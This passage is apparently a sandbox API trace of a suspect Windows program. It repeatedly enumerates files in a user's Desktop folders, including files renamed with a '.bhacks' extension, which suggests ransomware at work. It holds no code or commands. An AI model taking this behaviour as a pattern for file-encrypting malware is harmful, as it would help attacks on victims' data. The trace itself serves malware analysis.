ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x4b80, dwReserved0=0x0, dwReserved1=0x0, cFileName="DqUNIlu.gif.bhacks", cAlternateFileName="DQUNIL~1.BHA")) returned 1 [0065.105] FindNextFileW (in: hFindFile=0x9be540, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xebefe850, ftCreationTime.dwHighDateTime=0x1d5c92c, ftLastAccessTime.dwLowDateTime=0x573996f0, ftLastAccessTime.dwHighDateTime=0x1d5d1b7, ftLastWriteTime.dwLowDateTime=0x573996f0, ftLastWriteTime.dwHighDateTime=0x1d5d1b7, nFileSizeHigh=0x0, nFileSizeLow=0x9efc, dwReserved0=0x0, dwReserved1=0x0, cFileName="E hy.wav", cAlternateFileName="EHY~1.WAV")) returned 1 [0065.105] FindNextFileW (in: hFindFile=0x9be540, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67baf930, ftCreationTime.dwHighDateTime=0x1d5d160, ftLastAccessTime.dwLowDateTime=0xc1284a30, ftLastAccessTime.dwHighDateTime=0x1d5d382, ftLastWriteTime.dwLowDateTime=0xc1284a30, ftLastWriteTime.dwHighDateTime=0x1d5d382, nFileSizeHigh=0x0, nFileSizeLow=0x13ea7, dwReserved0=0x0, dwReserved1=0x0, cFileName="eacUdxJuUDfuA061.xls", cAlternateFileName="EACUDX~1.XLS")) returned 1 [0065.105] FindNextFileW (in: hFindFile=0x9be540, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5fad9210, ftCreationTime.dwHighDateTime=0x1d5cdab, ftLastAccessTime.dwLowDateTime=0xc7ac12f0, ftLastAccessTime.dwHighDateTime=0x1d5d0c7, ftLastWriteTime.dwLowDateTime=0xc7ac12f0, ftLastWriteTime.dwHighDateTime=0x1d5d0c7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ED 0nXQ VIkUvYr6", cAlternateFileName="ED0NXQ~1")) returned 1 [0065.105] FindNextFileW (in: hFindFile=0x9be540, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd4f31cb0, ftCreationTime.dwHighDateTime=0x1d5d48c, ftLastAccessTime.dwLowDateTime=0x8a825cf0, ftLastAccessTime.dwHighDateTime=0x1d5ca63, ftLastWriteTime.dwLowDateTime=0x8a825cf0, ftLastWriteTime.dwHighDateTime=0x1d5ca63, nFileSizeHigh=0x0, nFileSizeLow=0xd9f9, dwReserved0=0x0, dwReserved1=0x0, cFileName="EkLB 1ywsMV77uH53.wav", cAlternateFileName="EKLB1Y~1.WAV")) returned 1 [0065.105] FindNextFileW (in: hFindFile=0x9be540, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56e63d70, ftCreationTime.dwHighDateTime=0x1d5cf5f, ftLastAccessTime.dwLowDateTime=0x61643820, ftLastAccessTime.dwHighDateTime=0x1d5cbfd, ftLastWriteTime.dwLowDateTime=0x61643820, ftLastWriteTime.dwHighDateTime=0x1d5cbfd, nFileSizeHigh=0x0, nFileSizeLow=0x11fe4, dwReserved0=0x0, dwReserved1=0x0, cFileName="ERgdUGLd4HevVs5.odt", cAlternateFileName="ERGDUG~1.ODT")) returned 1 [0065.105] FindNextFileW (in: hFindFile=0x9be540, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5b11b8b0, ftCreationTime.dwHighDateTime=0x1d5c84e, ftLastAccessTime.dwLowDateTime=0x62c618a0, ftLastAccessTime.dwHighDateTime=0x1d5c9b9, ftLastWriteTime.dwLowDateTime=0x62c618a0, ftLastWriteTime.dwHighDateTime=0x1d5c9b9, nFileSizeHigh=0x0, nFileSizeLow=0x7189, dwReserved0=0x0, dwReserved1=0x0, cFileName="fqpL_g35J.m4a", cAlternateFileName="FQPL_G~1.M4A")) returned 1 [0065.105] FindNextFileW (in: hFindFile=0x9be540, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc87e190, ftCreationTime.dwHighDateTime=0x1d5d4f7, ftLastAccessTime.dwLowDateTime=0x337ee530, ftLastAccessTime.dwHighDateTime=0x1d5caa0, ftLastWriteTime.dwLowDateTime=0x337ee530, ftLastWriteTime.dwHighDateTime=0x1d5caa0, nFileSizeHigh=0x0, nFileSizeLow=0x1868d, dwReserved0=0x0, dwReserved1=0x0, cFileName="i6 iY_C6BkJ.m4a", cAlternateFileName="I6IY_C~1.M4A")) returned 1 [0065.105] FindNextFileW (in: hFindFile=0x9be540, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x23c2351d, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x23c2351d, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x23e85b50, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x10260, dwReserved0=0x0, dwReserved1=0x0, cFileName="j51yJlAI1.gif.bhacks", cAlternateFileName="J51YJL~1.BHA")) returned 1 [0065.105] FindNextFileW (in: hFindFile=0x9be540, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x38e7c380, ftCreationTime.dwHighDateTime=0x1d5d648, ftLastAccessTime.dwLowDateTime=0xe93bdd60, ftLastAccessTime.dwHighDateTime=0x1d5d4c8, ftLastWriteTime.dwLowDateTime=0xe93bdd60, ftLastWriteTime.dwHighDateTime=0x1d5d4c8, nFileSizeHigh=0x0, nFileSizeLow=0x9417, dwReserved0=0x0, dwReserved1=0x0, cFileName="JkNoq.avi", cAlternateFileName="")) returned 1 [0065.105] FindNextFileW (in: hFindFile=0x9be540, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b79f760, ftCreationTime.dwHighDateTime=0x1d5d23a, ftLastAccessTime.dwLowDateTime=0x3cfbbf90, ftLastAccessTime.dwHighDateTime=0x1d5c9db, ftLastWriteTime.dwLowDateTime=0x3cfbbf90, ftLastWriteTime.dwHighDateTime=0x1d5c9db, nFileSizeHigh=0x0, nFileSizeLow=0xfb6b, dwReserved0=0x0, dwReserved1=0x0, cFileName="J_gUxI4K04bkqo7tW4.avi", cAlternateFileName="J_GUXI~1.AVI")) returned 1 [0065.105] FindNextFileW (in: hFindFile=0x9be540, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6b501110, ftCreationTime.dwHighDateTime=0x1d5d535, ftLastAccessTime.dwLowDateTime=0xa751ce0, ftLastAccessTime.dwHighDateTime=0x1d5cba4, ftLastWriteTime.dwLowDateTime=0xa751ce0, ftLastWriteTime.dwHighDateTime=0x1d5cba4, nFileSizeHigh=0x0, nFileSizeLow=0x454f, dwReserved0=0x0, dwReserved1=0x0, cFileName="Kz5g.mp4", cAlternateFileName="")) returned 1 [0065.105] FindNextFileW (in: hFindFile=0x9be540, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x23ef8520, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x23ef8520, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x2402951c, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x2da0, dwReserved0=0x0, dwReserved1=0x0, cFileName="mCQMPnOOyUYP.gif.bhacks", cAlternateFileName="MCQMPN~1.BHA")) returned 1 [0065.105] FindNextFileW (in: hFindFile=0x9be540, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54866930, ftCreationTime.dwHighDateTime=0x1d5d66a, ftLastAccessTime.dwLowDateTime=0x5f4a3830, ftLastAccessTime.dwHighDateTime=0x1d5d023, ftLastWriteTime.dwLowDateTime=0x5f4a3830, ftLastWriteTime.dwHighDateTime=0x1d5d023, nFileSizeHigh=0x0, nFileSizeLow=0xecc, dwReserved0=0x0, dwReserved1=0x0, cFileName="MdUrzCG7I8VQVwhMz8.rtf", cAlternateFileName="MDURZC~1.RTF")) returned 1 [0065.105] FindNextFileW (in: hFindFile=0x9be540, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3022d80, ftCreationTime.dwHighDateTime=0x1d5cb0f, ftLastAccessTime.dwLowDateTime=0x7517fd0, ftLastAccessTime.dwHighDateTime=0x1d5d596, ftLastWriteTime.dwLowDateTime=0x7517fd0, ftLastWriteTime.dwHighDateTime=0x1d5d596, nFileSizeHigh=0x0, nFileSizeLow=0x80c1, dwReserved0=0x0, dwReserved1=0x0, cFileName="MH23a5.bmp", cAlternateFileName="")) returned 1 [0065.105] FindNextFileW (in: hFindFile=0x9be540, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e6a2940, ftCreationTime.dwHighDateTime=0x1d5d2ed, ftLastAccessTime.dwLowDateTime=0xbbd52910, ftLastAccessTime.dwHighDateTime=0x1d5c822, ftLastWriteTime.dwLowDateTime=0xbbd52910, ftLastWriteTime.dwHighDateTime=0x1d5c822, nFileSizeHigh=0x0, nFileSizeLow=0xb5e3, dwReserved0=0x0, dwReserved1=0x0, cFileName="nYVw1n1XTh2-sApcS7w.mp4", cAlternateFileName="NYVW1N~1.MP4")) returned 1 [0065.105] FindNextFileW (in: hFindFile=0x9be540, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7910b730, ftCreationTime.dwHighDateTime=0x1d5d221, ftLastAccessTime.dwLowDateTime=0x2c63f080, ftLastAccessTime.dwHighDateTime=0x1d5cce2, ftLastWriteTime.dwLowDateTime=0x2c63f080, ftLastWriteTime.dwHighDateTime=0x1d5cce2, nFileSizeHigh=0x0, nFileSizeLow=0xd499, dwReserved0=0x0, dwReserved1=0x0, cFileName="og9u_G4EHl49Tl.flv", cAlternateFileName="OG9U_G~1.FLV")) returned 1 [0065.105] FindNextFileW (in: hFindFile=0x9be540, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa4212db0, ftCreationTime.dwHighDateTime=0x1d5d63b, ftLastAccessTime.dwLowDateTime=0xa0b30de0, ftLastAccessTime.dwHighDateTime=0x1d5d78c, ftLastWriteTime.dwLowDateTime=0xa0b30de0, ftLastWriteTime.dwHighDateTime=0x1d5d78c, nFileSizeHigh=0x0, nFileSizeLow=0x408e, dwReserved0=0x0, dwReserved1=0x0, cFileName="QgQCsu7ShKSSIL.m4a", cAlternateFileName="QGQCSU~1.M4A")) returned 1 [0065.105] FindNextFileW (in: hFindFile=0x9be540, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x88b6f190, ftCreationTime.dwHighDateTime=0x1d5d631, ftLastAccessTime.dwLowDateTime=0x1cebe780, ftLastAccessTime.dwHighDateTime=0x1d5d024, ftLastWriteTime.dwLowDateTime=0x1cebe780, ftLastWriteTime.dwHighDateTime=0x1d5d024, nFileSizeHigh=0x0, nFileSizeLow=0x7bd2, dwReserved0=0x0, dwReserved1=0x0, cFileName="Tab3I0y Y3.avi", cAlternateFileName="TAB3I0~1.AVI")) returned 1 [0065.105] FindNextFileW (in: hFindFile=0x9be540, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c10d530, ftCreationTime.dwHighDateTime=0x1d5cb12, ftLastAccessTime.dwLowDateTime=0xe28a1830, ftLastAccessTime.dwHighDateTime=0x1d5d390, ftLastWriteTime.dwLowDateTime=0xe28a1830, ftLastWriteTime.dwHighDateTime=0x1d5d390, nFileSizeHigh=0x0, nFileSizeLow=0x1e8b, dwReserved0=0x0, dwReserved1=0x0, cFileName="TtFu8ac2GuQ.mp3", cAlternateFileName="TTFU8A~1.MP3")) returned 1 [0065.105] FindNextFileW (in: hFindFile=0x9be540, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c15f530, ftCreationTime.dwHighDateTime=0x1d5d49d, ftLastAccessTime.dwLowDateTime=0x2fe34c90, ftLastAccessTime.dwHighDateTime=0x1d5d801, ftLastWriteTime.dwLowDateTime=0x2fe34c90, ftLastWriteTime.dwHighDateTime=0x1d5d801, nFileSizeHigh=0x0, nFileSizeLow=0x6236, dwReserved0=0x0, dwReserved1=0x0, cFileName="vY9PyxRY3.odp", cAlternateFileName="VY9PYX~1.ODP")) returned 1 [0065.105] FindNextFileW (in: hFindFile=0x9be540, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x241cd0f6, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x241cd0f6, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x2421963f, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x3450, dwReserved0=0x0, dwReserved1=0x0, cFileName="W3nCKPmZd6_T8yGD3CRn.jpg.bhacks", cAlternateFileName="W3NCKP~1.BHA")) returned 1 [0065.105] FindNextFileW (in: hFindFile=0x9be540, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdb154e40, ftCreationTime.dwHighDateTime=0x1d5ce80, ftLastAccessTime.dwLowDateTime=0x71f710b0, ftLastAccessTime.dwHighDateTime=0x1d5d263, ftLastWriteTime.dwLowDateTime=0x71f710b0, ftLastWriteTime.dwHighDateTime=0x1d5d263, nFileSizeHigh=0x0, nFileSizeLow=0xa113, dwReserved0=0x0, dwReserved1=0x0, cFileName="WLViPvkU.mp4", cAlternateFileName="")) returned 1 [0065.105] FindNextFileW (in: hFindFile=0x9be540, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2aa462e0, ftCreationTime.dwHighDateTime=0x1d5d5b9, ftLastAccessTime.dwLowDateTime=0x2451772f, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x2451772f, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="yi TyUTEx1dVRHalW", cAlternateFileName="YITYUT~1")) returned 1 [0065.105] FindNextFileW (in: hFindFile=0x9be540, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc92ca540, ftCreationTime.dwHighDateTime=0x1d5c8c0, ftLastAccessTime.dwLowDateTime=0xc2425e30, ftLastAccessTime.dwHighDateTime=0x1d5c9e9, ftLastWriteTime.dwLowDateTime=0xc2425e30, ftLastWriteTime.dwHighDateTime=0x1d5c9e9, nFileSizeHigh=0x0, nFileSizeLow=0xcf42, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZvWDNly8ss.csv", cAlternateFileName="ZVWDNL~1.CSV")) returned 1 [0065.105] FindNextFileW (in: hFindFile=0x9be540, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc92ca540, ftCreationTime.dwHighDateTime=0x1d5c8c0, ftLastAccessTime.dwLowDateTime=0xc2425e30, ftLastAccessTime.dwHighDateTime=0x1d5c9e9, ftLastWriteTime.dwLowDateTime=0xc2425e30, ftLastWriteTime.dwHighDateTime=0x1d5c9e9, nFileSizeHigh=0x0, nFileSizeLow=0xcf42, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZvWDNly8ss.csv", cAlternateFileName="ZVWDNL~1.CSV")) returned 0 [0065.106] FindClose (in: hFindFile=0x9be540 | out: hFindFile=0x9be540) returned 1 [0065.106] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\*.cpp", lpFindFileData=0x6fe810 | out: lpFindFileData=0x6fe810*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0065.106] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\ED 0nXQ VIkUvYr6\\*", lpFindFileData=0x6fe790 | out: lpFindFileData=0x6fe790*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5fad9210, ftCreationTime.dwHighDateTime=0x1d5cdab, ftLastAccessTime.dwLowDateTime=0xc7ac12f0, ftLastAccessTime.dwHighDateTime=0x1d5d0c7, ftLastWriteTime.dwLowDateTime=0xc7ac12f0, ftLastWriteTime.dwHighDateTime=0x1d5d0c7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x9be540 [0065.106] FindNextFileW (in: hFindFile=0x9be540, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5fad9210, ftCreationTime.dwHighDateTime=0x1d5cdab, ftLastAccessTime.dwLowDateTime=0xc7ac12f0, ftLastAccessTime.dwHighDateTime=0x1d5d0c7, ftLastWriteTime.dwLowDateTime=0xc7ac12f0, ftLastWriteTime.dwHighDateTime=0x1d5d0c7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.106] FindNextFileW (in: hFindFile=0x9be540, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a026230, ftCreationTime.dwHighDateTime=0x1d5c8dc, ftLastAccessTime.dwLowDateTime=0xce447400, ftLastAccessTime.dwHighDateTime=0x1d5d6f2, ftLastWriteTime.dwLowDateTime=0xce447400, ftLastWriteTime.dwHighDateTime=0x1d5d6f2, nFileSizeHigh=0x0, nFileSizeLow=0x619e, dwReserved0=0x0, dwReserved1=0x0, cFileName="5E4_Kcg6cqpR-gwb.swf", cAlternateFileName="5E4_KC~1.SWF")) returned 1 [0065.106] FindNextFileW (in: hFindFile=0x9be540, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xccb40900, ftCreationTime.dwHighDateTime=0x1d5d73f, ftLastAccessTime.dwLowDateTime=0xdb0cc290, ftLastAccessTime.dwHighDateTime=0x1d5d0cc, ftLastWriteTime.dwLowDateTime=0xdb0cc290, ftLastWriteTime.dwHighDateTime=0x1d5d0cc, nFileSizeHigh=0x0, nFileSizeLow=0x15772, dwReserved0=0x0, dwReserved1=0x0, cFileName="6xiRzqk0e.mp3", cAlternateFileName="6XIRZQ~1.MP3")) returned 1 [0065.106] FindNextFileW (in: hFindFile=0x9be540, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf01d96e0, ftCreationTime.dwHighDateTime=0x1d5d6ea, ftLastAccessTime.dwLowDateTime=0x726bd8e0, ftLastAccessTime.dwHighDateTime=0x1d5c85a, ftLastWriteTime.dwLowDateTime=0x726bd8e0, ftLastWriteTime.dwHighDateTime=0x1d5c85a, nFileSizeHigh=0x0, nFileSizeLow=0xbe65, dwReserved0=0x0, dwReserved1=0x0, cFileName="FisMdRNWBNOEJ4Av.swf", cAlternateFileName="FISMDR~1.SWF")) returned 1 [0065.106] FindNextFileW (in: hFindFile=0x9be540, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7febd840, ftCreationTime.dwHighDateTime=0x1d5d678, ftLastAccessTime.dwLowDateTime=0x2be003f0, ftLastAccessTime.dwHighDateTime=0x1d5d729, ftLastWriteTime.dwLowDateTime=0x2be003f0, ftLastWriteTime.dwHighDateTime=0x1d5d729, nFileSizeHigh=0x0, nFileSizeLow=0x7812, dwReserved0=0x0, dwReserved1=0x0, cFileName="JFBPLC7ZEPj.ppt", cAlternateFileName="JFBPLC~1.PPT")) returned 1 [0065.106] FindNextFileW (in: hFindFile=0x9be540, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbd50430, ftCreationTime.dwHighDateTime=0x1d5d21c, ftLastAccessTime.dwLowDateTime=0xf6f6dab0, ftLastAccessTime.dwHighDateTime=0x1d5ce31, ftLastWriteTime.dwLowDateTime=0xf6f6dab0, ftLastWriteTime.dwHighDateTime=0x1d5ce31, nFileSizeHigh=0x0, nFileSizeLow=0x42b4, dwReserved0=0x0, dwReserved1=0x0, cFileName="RJ4fo8BlUIkNkFgvJDB3.wav", cAlternateFileName="RJ4FO8~1.WAV")) returned 1 [0065.106] FindNextFileW (in: hFindFile=0x9be540, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x14a3e890, ftCreationTime.dwHighDateTime=0x1d5cc94, ftLastAccessTime.dwLowDateTime=0x99291d00, ftLastAccessTime.dwHighDateTime=0x1d5d758, ftLastWriteTime.dwLowDateTime=0x99291d00, ftLastWriteTime.dwHighDateTime=0x1d5d758, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="uqU-SQkb", cAlternateFileName="")) returned 1 [0065.106] FindNextFileW (in: hFindFile=0x9be540, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x14a3e890, ftCreationTime.dwHighDateTime=0x1d5cc94, ftLastAccessTime.dwLowDateTime=0x99291d00, ftLastAccessTime.dwHighDateTime=0x1d5d758, ftLastWriteTime.dwLowDateTime=0x99291d00, ftLastWriteTime.dwHighDateTime=0x1d5d758, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="uqU-SQkb", cAlternateFileName="")) returned 0 [0065.106] FindClose (in: hFindFile=0x9be540 | out: hFindFile=0x9be540) returned 1 [0065.106] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\ED 0nXQ VIkUvYr6\\*.cpp", lpFindFileData=0x6fe810 | out: lpFindFileData=0x6fe810*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0065.106] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\ED 0nXQ VIkUvYr6\\uqU-SQkb\\*", lpFindFileData=0x6fe790 | out: lpFindFileData=0x6fe790*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x14a3e890, ftCreationTime.dwHighDateTime=0x1d5cc94, ftLastAccessTime.dwLowDateTime=0x99291d00, ftLastAccessTime.dwHighDateTime=0x1d5d758, ftLastWriteTime.dwLowDateTime=0x99291d00, ftLastWriteTime.dwHighDateTime=0x1d5d758, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x9be600 [0065.107] FindNextFileW (in: hFindFile=0x9be600, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x14a3e890, ftCreationTime.dwHighDateTime=0x1d5cc94, ftLastAccessTime.dwLowDateTime=0x99291d00, ftLastAccessTime.dwHighDateTime=0x1d5d758, ftLastWriteTime.dwLowDateTime=0x99291d00, ftLastWriteTime.dwHighDateTime=0x1d5d758, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.107] FindNextFileW (in: hFindFile=0x9be600, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6bda560, ftCreationTime.dwHighDateTime=0x1d5c954, ftLastAccessTime.dwLowDateTime=0xb7ba9f80, ftLastAccessTime.dwHighDateTime=0x1d5cd4b, ftLastWriteTime.dwLowDateTime=0xb7ba9f80, ftLastWriteTime.dwHighDateTime=0x1d5cd4b, nFileSizeHigh=0x0, nFileSizeLow=0x3271, dwReserved0=0x0, dwReserved1=0x0, cFileName="DOdivRJBTXgzUJ.wav", cAlternateFileName="DODIVR~1.WAV")) returned 1 [0065.107] FindNextFileW (in: hFindFile=0x9be600, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71fd8190, ftCreationTime.dwHighDateTime=0x1d5d3dd, ftLastAccessTime.dwLowDateTime=0x25c817f0, ftLastAccessTime.dwHighDateTime=0x1d5ce55, ftLastWriteTime.dwLowDateTime=0x25c817f0, ftLastWriteTime.dwHighDateTime=0x1d5ce55, nFileSizeHigh=0x0, nFileSizeLow=0xb4eb, dwReserved0=0x0, dwReserved1=0x0, cFileName="E2jRFWUv.xlsx", cAlternateFileName="E2JRFW~1.XLS")) returned 1 [0065.107] FindNextFileW (in: hFindFile=0x9be600, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd9298a40, ftCreationTime.dwHighDateTime=0x1d5cdc4, ftLastAccessTime.dwLowDateTime=0xb615c9a0, ftLastAccessTime.dwHighDateTime=0x1d5d360, ftLastWriteTime.dwLowDateTime=0xb615c9a0, ftLastWriteTime.dwHighDateTime=0x1d5d360, nFileSizeHigh=0x0, nFileSizeLow=0x68aa, dwReserved0=0x0, dwReserved1=0x0, cFileName="krWg9z-VUaci.wav", cAlternateFileName="KRWG9Z~1.WAV")) returned 1 [0065.107] FindNextFileW (in: hFindFile=0x9be600, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa5714a10, ftCreationTime.dwHighDateTime=0x1d5d59b, ftLastAccessTime.dwLowDateTime=0xafa97800, ftLastAccessTime.dwHighDateTime=0x1d5d2cf, ftLastWriteTime.dwLowDateTime=0xafa97800, ftLastWriteTime.dwHighDateTime=0x1d5d2cf, nFileSizeHigh=0x0, nFileSizeLow=0x10b8b, dwReserved0=0x0, dwReserved1=0x0, cFileName="KsPC3.bmp", cAlternateFileName="")) returned 1 [0065.107] FindNextFileW (in: hFindFile=0x9be600, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c0240, ftCreationTime.dwHighDateTime=0x1d5d7c3, ftLastAccessTime.dwLowDateTime=0x626ed2a0, ftLastAccessTime.dwHighDateTime=0x1d5ccb3, ftLastWriteTime.dwLowDateTime=0x626ed2a0, ftLastWriteTime.dwHighDateTime=0x1d5ccb3, nFileSizeHigh=0x0, nFileSizeLow=0xad34, dwReserved0=0x0, dwReserved1=0x0, cFileName="kZHWiDNy.mp4", cAlternateFileName="")) returned 1 [0065.107] FindNextFileW (in: hFindFile=0x9be600, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa2d402a0, ftCreationTime.dwHighDateTime=0x1d5d269, ftLastAccessTime.dwLowDateTime=0x6cdeacf0, ftLastAccessTime.dwHighDateTime=0x1d5d1eb, ftLastWriteTime.dwLowDateTime=0x6cdeacf0, ftLastWriteTime.dwHighDateTime=0x1d5d1eb, nFileSizeHigh=0x0, nFileSizeLow=0xad19, dwReserved0=0x0, dwReserved1=0x0, cFileName="Oo6K.m4a", cAlternateFileName="")) returned 1 